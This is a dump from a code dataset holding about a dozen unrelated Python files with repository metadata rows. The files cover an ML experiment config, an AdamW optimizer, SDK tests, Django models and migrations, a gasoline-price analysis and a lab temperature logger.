and the values of its hyper-parameters in state.hyper_parameters, and
run the code that is located in state.extract_results on this model
using jobman.
Actually, we add the job here and it can be launched later as usual
(please check how to start jobs using jobman from the jobman tutorial
website)
"""
from jobman.tools import DD, flatten
from jobman import api0, sql
from pylearn2.scripts.jobman import experiment
def result_extractor(train_obj):
"""
This is a user specific function, that is used by jobman to extract results
The returned dictionary will be saved in state.results
"""
import numpy
channels = train_obj.model.monitor.channels
train_cost = channels['sgd_cost(ExhaustiveSGD[X])']
best_epoch = numpy.argmin(train_cost.val_record)
best_rec_error = train_cost.val_record[best_epoch]
batch_num = train_cost.batch_record[best_epoch]
return dict(
best_epoch=best_epoch,
train_rec_error=best_rec_error,
batch_num=batch_num)
if __name__ == '__main__':
db = api0.open_db('sqlite:///test.db?table=test_jobman_pylearn2')
state = DD()
state.yaml_template = '''
!obj:pylearn2.train.Train {
"dataset": !obj:pylearn2.datasets.npy_npz.NpyDataset &dataset {
"file" : "%(file)s"
},
"model": !obj:pylearn2.autoencoder.ContractiveAutoencoder {
"nvis" : %(nvis)d,
"nhid" : %(nhid)d,
"irange" : 0.05,
"act_enc": "sigmoid", #for some reason only sigmoid function works
"act_dec": "sigmoid",
},
"algorithm": !obj:pylearn2.training_algorithms.sgd.SGD {
"learning_rate" : %(learning_rate)f,
"batch_size" : %(batch_size)d,
"monitoring_batches" : 5,
"monitoring_dataset" : *dataset,
"cost" : !obj:pylearn2.costs.cost.SumOfCosts {
"costs": [
[1.0, !obj:pylearn2.costs.autoencoder.MeanBinaryCrossEntropy {} ],
[%(coefficient)f, !obj:pylearn2.costs.cost.MethodCost { method: 'contraction_penalty' } ]
]
},
"termination_criterion" : %(term_crit)s,
}
}
'''
state.hyper_parameters = {
"file": "${PYLEARN2_DATA_PATH}/UTLC/pca/sylvester_train_x_pca32.npy",
"nvis": 32,
"nhid": 6,
"learning_rate": 0.1,
"batch_size": 10,
"coefficient": 0.5,
"term_crit": {
"__builder__": "pylearn2.training_algorithms.sgd.EpochCounter",
"max_epochs": 2
}
}
state.extract_results = "pylearn2.scripts.jobman.tester.result_extractor"
sql.insert_job(
experiment.train_experiment,
flatten(state),
db,
force_dup=True)
|
[
"lionelpigou@gmail.com"
] |
lionelpigou@gmail.com
|
77f509fce29adca2f0ee33c911a594f1f01a20a5
|
f2e503885666f35f9c50c9cff411c3a47fb81093
|
/andelabs1.py
|
fd8af25851ab59ffa321b1e06b42dd65a50dd245
|
[] |
no_license
|
SamwelOpiyo/andelabs
|
87c7a6b0ae078afd0a4b620dc4f0a7ba898e006c
|
fa7b6fe14f3942d2ee47f81e6a78a375dd7e2210
|
refs/heads/master
| 2021-01-09T20:43:23.986700
| 2017-01-22T19:45:19
| 2017-01-22T19:45:19
| 65,727,292
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
def prime():
integer = int(raw_input("Enter an Integer:"))
prime_list = list()
if integer==2:
prime_list.append(integer)
elif integer==3:
prime_list.append(2)
prime_list.append(integer)
else:
prime_list.append(2)
prime_list.append(3)
for k in range(4,integer+1):
prime_check(k)
return prime_list
print prime()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
58aad0ee9098bd5db56320c38d09085fce097091
|
9023909d2776e708755f98d5485c4cffb3a56000
|
/oneflow/compatible_single_client_python/nn/optimizer/adamw.py
|
a4f8cddbc181f472ebc8eeb4a1f3cbfcd18a3c89
|
[
"Apache-2.0"
] |
permissive
|
sailfish009/oneflow
|
f6cf95afe67e284d9f79f1a941e7251dfc58b0f7
|
4780aae50ab389472bd0b76c4333e7e0a1a56ef7
|
refs/heads/master
| 2023-06-24T02:06:40.957297
| 2021-07-26T09:35:29
| 2021-07-26T09:35:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,090
|
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import List, Dict, Callable, Union, Iterator, Tuple
import collections
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client.python.oneflow_export import (
oneflow_export,
experimental_api,
)
from oneflow.compatible.single_client.python.nn.parameter import Parameter
from oneflow.compatible.single_client.python.nn.optimizer.optimizer import (
ParamGroup,
Optimizer,
)
@oneflow_export("optim.AdamW")
@experimental_api
class AdamW(Optimizer):
r"""Implements AdamW algorithm.
The original Adam algorithm was proposed in `Adam: A Method for Stochastic Optimization`_.
The AdamW variant was proposed in `Decoupled Weight Decay Regularization`_.
The optimizer of the Adam-weight-decay algorithm.
(More details please refer to `Adam-weight-decay <https://www.fast.ai/2018/07/02/adam-weight-decay/>`_).
So we use Adam-weight-decay algorithm to solve this problem.
the equation of parameters updating is:
.. math::
& V_t = \beta_1*V_{t-1} + (1-\beta_1)*grad
& S_t = \beta_2*S_{t-1} + (1-\beta_2)*{grad} \odot {grad}
& \hat{g} = learning\_rate*(\frac{{V_t}}{\sqrt{{S_t}}+\epsilon}+\lambda*param_{old})
& param_{new} = param_{old} - \hat{g}
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (In the equation is λ, default: 0)
scale (float, optional): the scale factor of loss (default: 1.0)
.. _Adam\: A Method for Stochastic Optimization:
https://arxiv.org/abs/1412.6980
.. _Decoupled Weight Decay Regularization:
https://arxiv.org/abs/1711.05101
"""
def __init__(
self,
parameters: Union[Iterator[Parameter], List[Dict]],
lr: float = 1e-3,
betas: Tuple[float, float] = (0.9, 0.999),
eps: float = 1e-8,
weight_decay: float = 0,
amsgrad: bool = False,
scale: float = 1.0,
):
super().__init__()
assert lr >= 0.0, f"Invalid learning rate: {lr}"
assert eps >= 0.0, f"Invalid epsilon value: {eps}"
assert (
betas[0] >= 0.0 and betas[0] < 1.0
), f"Invalid beta parameter at index 0: {betas[0]}"
assert (
betas[1] >= 0.0 and betas[1] < 1.0
), f"Invalid beta parameter at index 1: {betas[1]}"
assert weight_decay >= 0.0, f"Invalid weight_decay value: {weight_decay}"
assert scale > 0.0, f"Invalid scale factor: {scale}"
assert amsgrad is False, "Not support AMSGrad now!"
self._default_options["lr"] = lr
self._default_options["eps"] = eps
self._default_options["betas"] = betas
self._default_options["weight_decay"] = weight_decay
self._default_options["amsgrad"] = amsgrad
self._default_options["scale"] = scale
# Add parameters
if isinstance(parameters, collections.abc.Iterator):
self.param_groups.append(ParamGroup(parameters, self._default_options))
else: # List[Dict]
for param in parameters:
self.param_groups.append(ParamGroup(param, self._default_options))
for param_group in self.param_groups:
for param in param_group.parameters:
assert param.is_leaf, "parameters must be leaf tensor"
self._state[param] = dict()
self._state[param]["exp_avg"] = flow.experimental.zeros_like(param)
self._state[param]["exp_avg_sq"] = flow.experimental.zeros_like(param)
self._op = (
flow.builtin_op("adam_update")
.Input("model")
.Input("model_diff")
.Input("m")
.Input("v")
.Attr("l1", 0.0)
.Attr("l2", 0.0)
.Build()
)
def step(self, closure: Callable = None):
"""Performs a single optimization step.
Args:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
with flow.no_grad():
loss = None
if closure is not None:
loss = closure()
for param_group in self.param_groups:
kwargs = {
"learning_rate_val": param_group["lr"],
"scale": param_group["scale"],
"weight_decay": param_group["weight_decay"],
"beta1": param_group["betas"][0],
"beta2": param_group["betas"][1],
"epsilon": param_group["eps"],
}
for param in param_group.parameters:
if param.grad is None:
continue
m_tensor = self._state[param]["exp_avg"]
v_tensor = self._state[param]["exp_avg_sq"]
self._op(
param, param.grad, m_tensor, v_tensor, **kwargs,
)
self._state["step"] = self._state["step"] + 1
return loss
|
[
"noreply@github.com"
] |
sailfish009.noreply@github.com
|
b6eb79f493fa5f99d269963e332bfdb0f53613f0
|
f8c3c677ba536fbf5a37ac4343c1f3f3acd4d9b6
|
/ICA_SDK/test/test_subscription.py
|
b9856eade3bbf9f75b638633d6bce99d475b5031
|
[] |
no_license
|
jsialar/integrated_IAP_SDK
|
5e6999b0a9beabe4dfc4f2b6c8b0f45b1b2f33eb
|
c9ff7685ef0a27dc4af512adcff914f55ead0edd
|
refs/heads/main
| 2023-08-25T04:16:27.219027
| 2021-10-26T16:06:09
| 2021-10-26T16:06:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,819
|
py
|
# coding: utf-8
"""
IAP Services
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import ICA_SDK
from ICA_SDK.models.subscription import Subscription # noqa: E501
from ICA_SDK.rest import ApiException
class TestSubscription(unittest.TestCase):
"""Subscription unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test Subscription
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = ICA_SDK.models.subscription.Subscription() # noqa: E501
if include_optional :
return Subscription(
id = '0',
urn = '0',
type = '0',
actions = [
'0'
],
filter_expression = '0',
name = '0',
description = '0',
delivery_target = ICA_SDK.models.delivery_target.DeliveryTarget(
aws_sns_topic = ICA_SDK.models.delivery_target_aws_sns_topic.DeliveryTargetAwsSnsTopic(
topic_arn = '0', ),
aws_sqs_queue = ICA_SDK.models.delivery_target_aws_sqs_queue.DeliveryTargetAwsSqsQueue(
queue_url = '0', ),
workflow_run_launch = ICA_SDK.models.delivery_target_workflow_run_launch.DeliveryTargetWorkflowRunLaunch(
id = '0',
version = '0',
name = '0',
input = ICA_SDK.models.input.input(), ), ),
match_identities = [
'0'
],
acl = [
'0'
],
tenant_id = '0',
created_by_user_id = '0',
time_created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
deleted_by_user_id = '0',
time_deleted = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
is_deleted = True
)
else :
return Subscription(
)
def testSubscription(self):
"""Test Subscription"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"siajunren@gmail.com"
] |
siajunren@gmail.com
|
a89de6c602a550c947a03e246638a7a409ca8899
|
878a3094430bb914717d641a4f4b06574e872518
|
/hm_00_python/hm_0x_编辑用.py
|
e3e42e7d8c6ae0ec59b41a29d979116092a16cdf
|
[] |
no_license
|
2020668/python2019
|
3f33eea85fdd3f2866d867859d5694abb71effe9
|
f8a98389fa09f95e72914afa4935afc5c68eaccd
|
refs/heads/master
| 2020-06-07T23:36:17.871376
| 2019-08-29T09:45:10
| 2019-08-29T09:45:10
| 193,116,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
def sum_2_num(num1,num2):
"""对两个数字求和"""
return num1 + num2
# 调用函数,并使用result变量接收计算结果
result = sum_2_num(10,20)
print("计算结果是: %d" % result)
|
[
"keen2020@outlook.com"
] |
keen2020@outlook.com
|
a361e33242f19d9a4224e3176f42124b93cac1ef
|
daf7f2ba83c57819e85356906919309933af4526
|
/util/validate-outputs.py
|
246d094723a6c9142614278f5d233e876eb43baa
|
[
"MIT"
] |
permissive
|
ihmwg/python-ihm
|
158514e6148fa6f2651548077cf386d4bbdf1483
|
ab685eaabd537a46184172cffe7a2f057343d390
|
refs/heads/main
| 2023-09-01T16:15:00.148446
| 2023-08-31T00:45:21
| 2023-08-31T00:45:21
| 123,497,102
| 17
| 8
|
MIT
| 2023-07-10T19:00:38
| 2018-03-01T21:57:40
|
Python
|
UTF-8
|
Python
| false
| false
| 976
|
py
|
#!/usr/bin/python3
"""Check the output of each example for validity against the PDBx
and IHM dictionaries.
This should be periodically rechecked in case the PDBx and IHM dictionaries
are updated.
"""
import sys
import os
import subprocess
import ihm.dictionary
import urllib.request
with urllib.request.urlopen(
'http://mmcif.wwpdb.org/dictionaries/ascii/mmcif_pdbx_v50.dic') as fh:
d_pdbx = ihm.dictionary.read(fh)
with urllib.request.urlopen(
'http://mmcif.wwpdb.org/dictionaries/ascii/mmcif_ihm.dic') as fh:
d_ihm = ihm.dictionary.read(fh)
pdbx_ihm = d_pdbx + d_ihm
for script in ('simple-docking.py', 'ligands_water.py',
'non_standard_residues.py'):
print(script)
subprocess.check_call([sys.executable, '../examples/' + script])
with open('output.cif') as fh:
try:
pdbx_ihm.validate(fh)
except ihm.dictionary.ValidatorError as exc:
print(exc)
os.unlink('output.cif')
|
[
"ben@salilab.org"
] |
ben@salilab.org
|
21e7a9d8d8ebbd2404e408c669c67da0b5559eb7
|
b0cdab54c5e81681125c01801148c287605ee8d0
|
/speciality/urls.py
|
74bbfe233256fb4a38f2fe7a7aa9036aae4aa4f5
|
[] |
no_license
|
lpd76/rdavid2
|
5528746749acc51d4d0f5efd77886929798e2569
|
18aa5120fe4ba0ea44f611dd52b008db52641f17
|
refs/heads/master
| 2020-04-13T20:47:58.141579
| 2019-01-17T16:51:31
| 2019-01-17T16:51:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('index', views.speciality_list, name='speciality_list'),
]
|
[
"louisphilippe.david@gmail.com"
] |
louisphilippe.david@gmail.com
|
dc82be647e361b442c5007d4a567670023744ff1
|
b420377a638dc9a5d8c09ebc39b0448d47ddb74e
|
/ddd-django/polls_app/base_site/views.py
|
6fe6e69eeec0dc6328f6242d5cb592395cd53429
|
[] |
no_license
|
shimakaze-git/drf-sample
|
d4e4e8e4d380f0b77e807d4bbf4e3f0d98ee6bcd
|
4294cd5adeea0ef51d3b7eee6a154d23dd089afc
|
refs/heads/master
| 2022-05-02T20:19:09.901257
| 2019-09-15T12:46:51
| 2019-09-15T12:46:51
| 205,698,781
| 0
| 0
| null | 2022-04-22T22:29:32
| 2019-09-01T15:52:14
|
Python
|
UTF-8
|
Python
| false
| false
| 626
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.views import View
class IndexView(View):
template_name = 'index.html'
def get(self, request):
context = {}
# return HttpResponse('test')
return render(request, self.template_name, context)
def post(self, request, *args, **kwargs):
print(request.POST)
context = {}
# return HttpResponse('test')
return render(request, self.template_name, context)
def index(request):
context = {}
# return HttpResponse('test')
return render(request, 'index.html', context)
|
[
"shimakaze.soft+github@googlemail.com"
] |
shimakaze.soft+github@googlemail.com
|
c355a985943e570ffb642a4967e78a28c1b18b0d
|
aca7ba7e5f801f89374ac4be3544ceb49889e59f
|
/data/diseases/importPgkbDis.py
|
81aac7a5322e0da4f0bbb60386ea2f6e8c024c63
|
[] |
no_license
|
strbean/pubMunch
|
582e47eadaeb5e204960c21d84d2eaf5d10b9726
|
c81d9935505779508df8e99577dd71cc104ea4ee
|
refs/heads/master
| 2020-03-21T10:22:57.685056
| 2018-06-24T05:05:37
| 2018-06-24T05:05:37
| 138,448,203
| 0
| 0
| null | 2018-06-24T02:43:32
| 2018-06-24T02:43:32
| null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
for line in open("diseases.tsv"):
if line.startswith("PharmGKB"):
continue
fields = line.split("\t")
name = fields[1]
syns = fields[2].split('","')
syns = [s.strip('",') for s in syns]
print "%s\t%s" % (name, "|".join(syns))
|
[
"max@soe.ucsc.edu"
] |
max@soe.ucsc.edu
|
9fbbcf8154c05f7064a216d1d47c4fefd91bb5af
|
fa114e6fa2c642613ac67960911a21b91bfa5089
|
/Home-Services/store/migrations/0001_initial.py
|
fa40f81506df6858bf11007e732078db786f4829
|
[] |
no_license
|
AbdurRahman111/Home-Work-Services
|
122c533d440da82199a3d4b647cd0feadb582d54
|
7cb8495d90f980264f97606da120662c7cf56d47
|
refs/heads/master
| 2023-04-06T22:53:34.590306
| 2021-04-12T08:23:49
| 2021-04-12T08:23:49
| 357,113,994
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,280
|
py
|
# Generated by Django 3.1.4 on 2021-02-28 08:30
import datetime
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('phone', models.CharField(max_length=15)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=500)),
('aadhar', models.CharField(max_length=100)),
('address', models.CharField(max_length=100)),
('area', models.CharField(max_length=100)),
('landmark', models.CharField(max_length=100)),
('pincode', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Feedback',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Appointment_id', models.CharField(max_length=200)),
('Service_provider_name', models.CharField(max_length=200)),
('Customer_name', models.CharField(max_length=200)),
('address', models.CharField(max_length=200)),
('Booking_date', models.CharField(max_length=200)),
('Completion_date', models.CharField(max_length=200)),
('Total_cost', models.CharField(max_length=50)),
('Review_Admin', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='ServiceProvider',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('phone', models.CharField(max_length=15)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=500)),
('service_type', models.CharField(max_length=200)),
('aadhar', models.CharField(max_length=100)),
('address', models.CharField(max_length=100)),
('area', models.CharField(max_length=100)),
('landmark', models.CharField(max_length=100)),
('pincode', models.CharField(max_length=10)),
('image', models.ImageField(upload_to='media/profiles/')),
('date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('price', models.IntegerField(default=0)),
('description', models.CharField(blank=True, default='', max_length=200, null=True)),
('image', models.ImageField(upload_to='media/products/')),
('complition_time', models.IntegerField(default=1)),
('category', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='store.category')),
('service_provider', models.ForeignKey(default=10, on_delete=django.db.models.deletion.CASCADE, to='store.serviceprovider')),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField(default=1)),
('price', models.IntegerField()),
('Service_date', models.CharField(blank=True, default='', max_length=50)),
('Time_slots', models.CharField(blank=True, default='', max_length=50)),
('date', models.DateField(default=datetime.datetime.today)),
('complition_date', models.DateField(default=datetime.datetime.today)),
('Accept_this_order', models.BooleanField(default=False)),
('Cancel_this_order', models.BooleanField(default=False)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.customer')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.product')),
('service_provider', models.ForeignKey(default=10, on_delete=django.db.models.deletion.CASCADE, to='store.serviceprovider')),
],
),
]
|
[
"mdabdurrahmanchowdhury1122@gmail.com"
] |
mdabdurrahmanchowdhury1122@gmail.com
|
1bd5242816fc5adefb64d1509e8712a63499e48a
|
1c0509a06cec726735048f00f63d2529f5e43ce6
|
/code_gasoline_france/analysis/analysis_dispersion/graphs/graphs_macro_trends.py
|
433290f30b21187244f88206ba00b34d93d9613b
|
[] |
no_license
|
etiennecha/master_code
|
e99c62e93aa052a66d4cdd3f3e3aa25a3aec4880
|
48821f6c854a1c6aa05cf81b653b3b757212b6f8
|
refs/heads/master
| 2021-01-23T14:35:45.904595
| 2018-03-11T18:57:38
| 2018-03-11T18:57:38
| 16,312,906
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,465
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import add_to_path
from add_to_path import path_data
from generic_master_price import *
from generic_master_info import *
path_dir_built = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_scraped_2011_2014')
path_dir_built_csv = os.path.join(path_dir_built, u'data_csv')
path_dir_built_dis = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_dispersion')
path_dir_built_dis_json = os.path.join(path_dir_built_dis, 'data_json')
path_dir_built_dis_csv = os.path.join(path_dir_built_dis, 'data_csv')
path_dir_built_dis_graphs = os.path.join(path_dir_built_dis, 'data_graphs')
path_dir_built_other = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_other')
path_dir_built_other_csv = os.path.join(path_dir_built_other, 'data_csv')
pd.set_option('float_format', '{:,.3f}'.format)
format_float_int = lambda x: '{:10,.0f}'.format(x)
format_float_float = lambda x: '{:10,.2f}'.format(x)
from pylab import *
rcParams['figure.figsize'] = 16, 6
## french date format
#import locale
#locale.setlocale(locale.LC_ALL, 'fra_fra')
dir_graphs = 'color'
str_ylabel = 'Price (euro/liter)'
# #########
# LOAD DATA
# #########
# DF STATION INFO
df_info = pd.read_csv(os.path.join(path_dir_built_csv,
'df_station_info_final.csv'),
encoding = 'utf-8',
dtype = {'id_station' : str,
'adr_zip' : str,
'adr_dpt' : str,
'ci_1' : str,
'ci_ardt_1' :str,
'ci_2' : str,
'ci_ardt_2' : str,
'dpt' : str},
parse_dates = [u'day_%s' %i for i in range(4)]) # fix
df_info.set_index('id_station', inplace = True)
df_info = df_info[df_info['highway'] != 1]
# DF PRICES
df_prices_ht = pd.read_csv(os.path.join(path_dir_built_csv,
'df_prices_ht_final.csv'),
parse_dates = ['date'])
df_prices_ht.set_index('date', inplace = True)
df_prices_ttc = pd.read_csv(os.path.join(path_dir_built_csv,
'df_prices_ttc_final.csv'),
parse_dates = ['date'])
df_prices_ttc.set_index('date', inplace = True)
# DF QUOTATIONS (WHOLESALE GAS PRICES)
df_quotations = pd.read_csv(os.path.join(path_dir_built_other_csv,
'df_quotations.csv'),
encoding = 'utf-8',
parse_dates = ['date'])
df_quotations.set_index('date', inplace = True)
# REFINE GROUP TYPE
# beginning: ELF + need to use future info
# (todo: add TA with no detected margin chge?)
df_info.loc[((df_info['brand_0'] == 'ELF') |\
(df_info['brand_last'] == 'ESSO_EXPRESS')),
'group_type'] = 'DIS'
df_info.loc[(df_info['brand_last'].isin(['ELF',
'ESSO_EXPRESS',
'TOTAL_ACCESS'])),
'group_type_last'] = 'DIS'
## Further GMS refining
#ls_hypers = ['AUCHAN', 'CARREFOUR', 'GEANT', 'LECLERC', 'CORA',
# 'INTERMARCHE', 'SYSTEMEU']
#df_info.loc[(df_info['brand_0'].isin(ls_hypers)),
# 'group_type'] = 'HYP'
#df_info.loc[(df_info['brand_last'].isin(ls_hypers)),
# 'group_type_last'] = 'HYP'
# ###############################
# GRAPHS: MACRO TRENDS
# ###############################
ls_sup_dis_ids = df_info[(df_info['group_type_last'] == 'SUP') |
((df_info['group_type'] == 'DIS') &\
(df_info['group_type_last'] == 'DIS'))].index
ls_oil_ind_ids = df_info[(df_info['group_type_last'] == 'OIL') |
(df_info['group_type_last'] == 'IND')].index
df_quotations['UFIP Brent R5 EL'] = df_quotations['UFIP Brent R5 EB'] / 158.987
#df_quotations[['UFIP Brent R5 EL', 'Europe Brent FOB EL']].plot()
#plt.show()
df_macro = pd.DataFrame(df_prices_ht.mean(1).values,
columns = [u'All gas stations'],
index = df_prices_ht.index)
df_macro['Brent'] = df_quotations['UFIP Brent R5 EL']
df_macro[u'Supermarket & Discount'] = df_prices_ht[ls_sup_dis_ids].mean(1)
df_macro[u'Oil & Independent'] = df_prices_ht[ls_oil_ind_ids].mean(1)
# Column order determines legend
df_macro = df_macro[[u'Brent',
u'All gas stations',
u'Supermarket & Discount',
u'Oil & Independent']]
df_macro['Brent'] = df_macro['Brent'].fillna(method = 'bfill')
fig = plt.figure()
ax1 = fig.add_subplot(111)
ls_l = []
for col, ls, alpha, color in zip(df_macro.columns,
['-', '-', '-', '-'],
[1, 1, 1, 1],
['b', 'g', 'r', 'c']):
ls_l.append(ax1.plot(df_macro.index,
df_macro[col].values,
c = color, ls = ls, alpha = alpha,
label = col))
lns = ls_l[0] + ls_l[1] + ls_l[2] + ls_l[3]
labs = [l.get_label() for l in lns]
ax1.legend(lns, labs, loc=0)
ax1.grid()
# Show ticks only on left and bottom axis, out of graph
ax1.yaxis.set_ticks_position('left')
ax1.xaxis.set_ticks_position('bottom')
ax1.get_yaxis().set_tick_params(which='both', direction='out')
ax1.get_xaxis().set_tick_params(which='both', direction='out')
plt.xlabel('')
plt.ylabel(str_ylabel)
plt.tight_layout()
plt.savefig(os.path.join(path_dir_built_dis_graphs,
dir_graphs,
'macro_trends.png'),
bbox_inches='tight')
plt.close()
# #################
# GRAPH PRICE CHGES
# #################
zero = 1e-10
df_chges = df_prices_ttc - df_prices_ttc.shift(1)
#df_chges = df_chges.ix['2012-01-01':'2012-12-31']
se_neg_chges = df_chges[df_chges < - zero].count(1)
se_pos_chges = df_chges[df_chges > zero].count(1)
fig = plt.figure()
ax = plt.subplot(111)
b0 = ax.bar(se_neg_chges.index,
(-se_neg_chges).values,
lw=0,
alpha = 0.5,
color = 'b')
b1 = ax.bar(se_pos_chges.index,
se_pos_chges.values,
lw=0,
alpha = 0.5,
color = 'g')
ax.legend((b1[0], b0[0]), ('Price increases', 'Price decreases'))
# make it symmetric
ax.set_ylim(-7000, 7000)
ax.set_yticks((-7000, -5000, -3000, -1000, 0, 1000, 3000, 5000, 7000))
# abs value: number of price changes
ax.set_yticklabels([u'{:.0f}'.format(x) for x in np.abs(ax.get_yticks())])
ax.grid()
# Show ticks only on left and bottom axis, out of graph
ax.yaxis.set_ticks_position('left')
ax.xaxis.set_ticks_position('bottom')
ax.get_yaxis().set_tick_params(which='both', direction='out')
ax.get_xaxis().set_tick_params(which='both', direction='out')
plt.ylabel(u'Nb price changes')
plt.tight_layout()
plt.savefig(os.path.join(path_dir_built_dis_graphs,
dir_graphs,
'macro_vol_price_chges.png'),
bbox_inches='tight')
plt.close()
|
[
"echamayou@gmail.com"
] |
echamayou@gmail.com
|
43a5269c653fb02480325cb8c86fd6ac270b6181
|
ce661026009d622db924080d85ab529f1cae6b60
|
/codingbat.com/not_string.py
|
3a13b969ff38b7af6b31a1ef6b1b887e7e4db819
|
[] |
no_license
|
predavlad/projecteuler
|
d54f5d85ab0133b19b54b4168990b90f09a0184c
|
58e1637733bb7e01e44bfac707353ecfe84d9b19
|
refs/heads/master
| 2021-01-23T15:29:26.257019
| 2019-02-09T10:11:23
| 2019-02-09T10:11:23
| 12,952,194
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
def not_string(str):
if str[0:3] == 'not':
return str
return "not " + str
assert not_string('candy') == 'not candy'
assert not_string('x') == 'not x'
assert not_string('not bad') == 'not bad'
|
[
"preda.vlad@yahoo.com"
] |
preda.vlad@yahoo.com
|
c137abb7879efd8cba96903b886443f16417a424
|
e1292fb9f2b359f71fbc54a4eb6ae4cf0c1ff51d
|
/machines/towermain/temperature.py
|
0f2911f2ee9401ba811d95d931d6a99320f76880
|
[] |
no_license
|
JNRiedel/PyExpLabSys
|
879d5c6bf552e89134629f0c6ca011af67937c3d
|
b69daaa9c932b9264d9f731cc3f2091f31f5d36e
|
refs/heads/master
| 2020-04-08T08:45:17.466865
| 2014-08-22T11:06:24
| 2014-08-22T11:06:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,371
|
py
|
# -*- coding: utf-8 -*-
"""This script read the sample temperature from an Omega CNi3244_C24
temperature control unit and makes it available on a data socket. Furthermore,
it also log significant temperature points to the database.
"""
import time
from PyExpLabSys.drivers.omega import CNi3244_C24
from PyExpLabSys.common.sockets import DateDataSocket
from PyExpLabSys.common.loggers import ContinuousLogger
from PyExpLabSys.common.utilities import get_logger
LOGGER = get_logger('temperatue', level='INFO', file_log=True,
file_name='temperature_log')
TEMPERATURE_CHANGE_THRESHOLD = 0.3
TIMEOUT = 600
SHORT_NAME = 'tts'
NAME = 'tower_temperature_sample'
def main_measure_loop(cni, socket, db_logger):
"""The main measuring loop"""
last_temp = -100000
last_time = 0
while True:
# Current values
now = time.time()
current = cni.read_temperature()
# The read_tempearture returns None if no thermocouple is connected
if current is not None:
# Set point on socket
socket.set_point_now(SHORT_NAME, current)
# Log if required
if now - last_time > TIMEOUT or\
abs(current - last_temp) > TEMPERATURE_CHANGE_THRESHOLD:
db_logger.enqueue_point_now('tower_temperature_sample',
current)
LOGGER.info('Value {} sent'.format(current))
last_time = now
last_temp = current
def main():
LOGGER.info('main started')
cni = CNi3244_C24(0)
socket = DateDataSocket([SHORT_NAME], timeouts=1.0)
socket.start()
db_logger = ContinuousLogger(
table='dateplots_tower', username='N/A', password='N/A',
measurement_codenames=[NAME],
dsn='servcinf'
)
db_logger.start()
time.sleep(0.1)
# Main part
try:
main_measure_loop(cni, socket, db_logger)
except KeyboardInterrupt:
LOGGER.info('Keyboard Interrupt. Shutting down!')
db_logger.stop()
cni.close()
socket.stop()
if __name__ == '__main__':
try:
main()
# This nasty little except on all exception makes sure that exception are
# logged
except Exception as e:
